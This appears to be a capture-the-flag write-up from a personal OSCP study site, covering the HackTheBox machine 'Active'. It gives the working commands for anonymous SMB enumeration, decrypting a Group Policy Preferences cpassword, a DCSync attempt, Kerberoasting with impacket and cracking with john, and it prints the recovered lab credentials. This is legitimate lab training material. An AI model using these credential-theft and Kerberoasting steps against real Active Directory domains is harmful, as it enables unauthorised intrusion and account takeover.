Braindump
Read BlogpostsLet's Connect
  • Introduction: My OSCP Journey
  • Writeup Index
  • OSCP Machine Writeups
    • 🔥PG - Practice
      • Shenzi
      • DVR4
      • Resourced
      • Kevin
      • Nara
      • Jacko
      • Authby
      • Access
      • Internal
      • Hutch
      • Algernon
      • HelpDesk
      • Squid
      • Hepet
      • Craft2
      • ClamAV
      • Pelican
      • Payday
      • Snookums
      • Bratarina
      • Nibbles
      • Hetemit
      • Hawat
      • Astronaut
      • Exfiltrated
      • Fanatastic
      • Wombo
      • Levram
      • LaVita
    • 💣HackTheBox
      • Devel
      • Legacy
      • Intelligence
        • Learning
      • Blackfield
        • PrivEsc - SeBackupPrivilege
      • Sauna
      • Bastard
      • Arctic
      • Forest
      • Active
      • SecNotes
      • Access
  • Preparation Notes
    • Tips and Tricks
      • File Transfer
      • Download a file - Windows CLI
      • Bypassing Firewall/Defender/UAC
      • Accessing File
      • Reverse Shell
      • OneLiner - Reverse/bind Shell
      • OneLiner - MSFVenom
    • Enumeration Techniques
      • System and Network Enumeration
      • Web Enumeration
      • Service Enum
      • CMS
    • Exploitation
      • Exploiting Web Apps
      • Exploiting Wordpress
      • Public Exploits
    • Privilege Escalation
      • Linux Privilege Escalation
        • Disk Group PrivEsc
      • Windows Privilege Escalation
    • Active Directory
      • Enumeration
      • AD Attacks
      • mimikatz
      • Lateral movement
    • Pivoting and Networking
      • SSH Port Forwarding
      • Ligolo-ng
    • Password Cracking
Powered by GitBook
On this page
  • Summary
  • Enumeration
  • Initial Foothold
  • Privilege Escalation

Was this helpful?

  1. OSCP Machine Writeups
  2. HackTheBox

Active

Summary

  • Found anonymous SMB access and enumerated the Replication share.

  • Discovered a GroupPolicyPreferences file (groups.xml) with GPP-encrypted credentials for SVC_TGS.

  • Decrypted the password using gpp-decrypt, then authenticated to SMB and retrieved the user.txt flag.

  • Discovered the machine was vulnerable to Kerberoasting — used GetUserSPNs to extract an Administrator ticket.

  • Cracked the Kerberos TGS hash with John, recovered plaintext Administrator password.

  • Unable to login via WinRM or RPC, so accessed the Users share again via SMB to extract the root.txt flag.


Enumeration

sudo nmap -A -sC -sN -p- -oN active_tcp.nmap -T4 10.10.10.100

Discovered shares using enum4linux:

Shares available anonymously:
- Replication (READABLE)
- IPC$ (Accessible)

Initial Foothold

Anonymous SMB access on Replication share:

smbclient //10.10.10.100/Replication -N
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

Found:

groups.xml → Contains GPP-encrypted password (cpassword)
Username: active.htb\SVC_TGS

Decrypted using:

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

Result:

Password: GPPstillStandingStrong2k18

Credentials:

Username: SVC_TGS
Password: GPPstillStandingStrong2k18
Domain: active.htb

SMB Share Access (Authenticated)

smbclient //10.10.10.100/Users -U active.htb/SVC_TGS

Successfully accessed Users share and retrieved user.txt flag.


Privilege Escalation

Tried secretsdump (DCSync):

impacket-secretsdump -just-dc-user Administrator active.htb/SVC_TGS:"GPPstillStandingStrong2k18"@10.10.10.100

No luck. DCSync not permitted.

Tried BloodHound, but LDAP enumeration failed.


Kerberoasting Attack

impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

Retrieved a service ticket for Administrator.

Cracked the TGS hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Recovered:

Password: Ticketmaster1968

Tested access:

smbclient //10.10.10.100/Users -U active.htb/Administrator

Success! Retrieved root.txt from Administrator’s directory via SMB share.

PreviousForestNextSecNotes

Last updated 8 days ago

Was this helpful?

💣